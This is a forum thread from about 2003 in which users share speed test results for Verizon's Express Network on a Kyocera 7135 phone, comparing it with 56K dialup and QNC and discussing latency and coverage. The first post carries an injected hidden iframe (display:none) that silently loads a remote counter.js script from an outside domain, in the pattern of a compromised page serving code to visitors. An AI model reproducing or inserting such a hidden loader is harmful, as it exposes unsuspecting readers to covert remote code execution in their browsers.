+ Reply to Thread
Page 1 of 2 1 2 LastLast

Express Network... Post Your Speed Test Results Here

With all the discussions on the Express Network speeds, I thought I would provide a forum to post speed test results. I am on a business trip and thought I would compare EN with my 56K Lucent WinModem built into my IBM ThinkPad laptop. I ran each test twice... once using my 7135 as a wireless modem connected through Express Network (I was getting "2 bars" on the signal strength meter) and then again with my internal 56K modem (it reported a connection speed of 45.2K). These results were conducted pretty much in the middle of nowhere in a hotel at an interstate exit in eastern rural TN (for what thats worth).

Here are my results:

Bandwidthplace.com
    EN Test 1 - 50.6K
    EN Test 2 - 69.8K
    Modem Test 1 - 37.3K
    Modem Test 2 - 37.8K

DSLReports.com
    EN Test 1 - 105K Download & 56K Upload
    EN Test 2 - 102K Download & 71K Upload
    Modem Test 1 - 36K Download & 21K Upload
    Modem Test 2 - 37K Download & 17K Upload

Toast.net
    EN Test 1 - 73K
    EN Test 2 - 127K
    EN Test 3 - 100K
    Modem Test 1 - 33K
    Modem Test 2 - 39K
    Modem Test 3 - 37K

Netease.net
    EN Test 1 - 48K Small File & 89K Large File
    EN Test 2 - 52K Small File & 90K Large File
    Modem Test 1 - 40K Small File & 24K Large File
    Modem Test 2 - 42K Small File & 24K Large File

Conclusions I drew from these tests:

1) Even in the middle of nowhere Express Network performance was very respectable.

2) Performace of the Express Network conection was consistently better than the modem. Sometimes by as much as 3X better performance.

3) The only time I will be using my internal laptop modem is when I am in an area without EN availability.

4) The Express Network connection seemed to perform better on speed tests with larger files than it did on speed tests with smaller files. I don't know if that was just chance or not. Might be worth some additional testing to see if file size does make a difference... Would favor downloads vs. web surfing.

5) One additional sideline thought... As I was traveling from Nashville TN to Morristown TN (about a 4-hour trip via interstate), I checked my 7135 every 30-minutes or so to see if I was in an Express Network area and everytime I checked I had the "1X" in the upper left of the screen. Coverage seems to be pretty complete (although I didn't get off the interstate to check it in the real "boonies")<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Regards, Steve

SLYDoggie,

I have travelled with the phone and done many tests -- my tests are about the same as yours -- EN is certainly faster than a 56K. This makes for a great travel machine.

But, the problem with EN that you noticed is due to latency. When there is a lot of back and forth in the TCP/IP connection, EN cannot match a dialup. There is also some packet loss with EN.

All in all, it's equal to or slightly better than dialup, and a good tool for road warriors.

Glenn

What about when out of area?

Hi, can you tell me what happens when you try to connect and are out of a 1x area? do you get the 14.4 that I'm getting on the Kyo 3035 phone or faster?

thanks,
    bobm

I'm only getting 28.3 kbps on bandwithplace.com. I have also noticed in other locations that it is very slow. EN is on and I have 3 bars of signal strenght. Location is San Francisco City. Any ideas how to speed it up to at least modem speed?

Re: What about when out of area?

Originally posted by bobm
    Hi, can you tell me what happens when you try to connect and are out of a 1x area? do you get the 14.4 that I'm getting on the Kyo 3035 phone or faster?

thanks,
    bobm
    A normal (non-Express Network) data connection is indeed 14.4. (Note that you may have to manually select this connection option (VZW Quick 2 Net) in your Network Prefs window when you are out of EN coverage.)

VERY SLOW

Maybe Its Just Me. Yesterday I Went On To Dsl reports. I Might As Well Been On My 56K Modem, Accually I Might have Gotten Better Results. I Have My 7135 On The Cradle Using USB Connection And My Transfer Speed Is 2kbps. I Think Upload Said 17 And Download Said 62 Not Impressive for EN. I Am Sure It Is On EN Because My Phone Says High Rate Data. Maybe Its A Setting Or Something I Don't Have A "Detail" Button In My NetworK Pref Just Connect/Disconnect. I Would Think It Would Be A Lot Faster Than QNC Not A Little Bit Faster.

How are you folks testing your speed. When I go to bandwidthplace and slect test, I get a screen that says "testing in progress" and then nothing else.

I have no idea what speeds I'm getting with my 7135.

Any help would be appreciated.

If That Link Doesn't Work use this one:

Venturi

Funny, when 3G rollouts were first announced I remember reading reports of users claiming they could run a bus of computers off their cell phone's 3G connection - that it was really as fast as broadband. Real world results would seem to indicate something quite different.

Anybody know how Verizon's Express Network speeds compare to Sprint PCS?

In any case, location: Wallingford, CT (06492). Here's my results:

BandwidthPlace.com

64.6 kilobits per second
    Communications 64.6 kilobits per second
    Storage 7.9 kilobytes per second
    1MB file download 2.2 minutes
    Subjective rating Slow

Info
    Date & time Sunday, November 30, 8:21PM*
    Test type IDT4 Free
    Connection type Wireless: 3G
    Region Connecticut
    Data size 605KB

DSLReports.com

Your download speed : 53286 bps, or 53 kbps.
    A 6.5 KB/sec transfer rate.
    Your upload speed : 66844 bps, or 66 kbps.
    Your connection hardly qualified as broadband, at least in that test

Toast.net

Loaded 414,161 bytes in 50.312 seconds from TOAST.net server.

33.6K Modem: 16-27K

56K Modem: 34-45K

ISDN/I-DSL: 100-120K

Your throughput: 66 K

Cable/ADSL: 229-950K

T1: 1078-1300K

Originally posted by speedracerx
    Funny, when 3G rollouts were first announced I remember reading reports of users claiming they could run a bus of computers off their cell phone's 3G connection - that it was really as fast as broadband. Real world results would seem to indicate something quite different.
    Hmmm...I never saw those reports. Were they published by a reputable publication?

WCDMA vendors have made some pretty optimistic speed claims but they are having a hard time getting the networks rolled out in any meaningful way. It looks like 1xEV-DO (not EV-DV) will win the race to true broadband. The 1x Express Network is really just a stop-gap measure until faster technologies are commercialized.
    -Data Rox

Last time I tried EN while my 7135 was connected to my laptop as a modem, I was getting about 95 Kbps.
    Michael

I would like to test the bandwidth speed of my "phone" when I'm surfing the web (not using the phone as a modem but surfing on the phone). I have EN and would like to find a way to get a speed check. Anyone have any ideas. Tried bandwidthplace.com but it would not give me a reading...

Thanks,

ThreeIees

Alltel

It sure would be nice if Alltel had a system comparable to EN....the only option is to pay like 50 bucks a month to get unlimited high-speed data....I guess I'm stuck with qnc until Alltel gets with the program.

Thanks Beryl :b_mirror

My results with the default settings of BMeter, using EN connection, are:

Host = noir.crocodile.org
    Iterations: 10
    Bytes Received: 40960
    Min = 668 bytes/sec
    Max = 2467 bytes/sec
    Avg = 1504 bytes/sec

Quite pathetic considering EN is supposed to be much faster.

Decided to try Q2N connection:
    Host = noir.crocodile.org
    Iterations: 10
    Bytes Received: 40960
    Min = 1066 bytes/sec
    Max = 1796 bytes/sec
    Avg = 1500 bytes/sec

Gee, why even bother using EN with these numbers!!
    Michael

I'm wondering the same thing myself Mike....

Hmmm. Haven't done this for a while. (Such fun!)

9/7/03 1X Test:
    Min = 2167 bytes/sec
    Max = 4995 bytes/sec
    Avg = 3025 bytes/sec

12/04/03 1X Test:
    Min = 1658 bytes/sec
    Max = 3079 bytes/sec
    Avg = 2235 bytes/sec

Things have deteriorated lately. It could be the increased load after LNP launched.

Are you all just running one test (of 10 iterations) each? Each test can yield dramatically different results... at least for EN. QNC seems to stay pretty consistent. Back when we did this a few months ago I think I ran like 10 tests each for EN and QNC and then averaged the numbers together.

I'm getting ready to go out to dinner, but later I'm going to test... I'm curious to see if the numbers for EN have really been going down
    Please visit my picture site: Robert-O-Rama :)

Originally posted by Robert K.
    QNC seems to stay pretty consistent.
    You should expect QNC to be dead on all the time. It's circuit switched so you get a voice sized, dedicated pipe to the "modem" (64Kb). You should expect the link into the internet from there to never be a bottle neck. Since we're talking low bandwidth, any variation you get with QNC is most likely due to conditions at the endpoints (phone, or server on the internet).

-Quick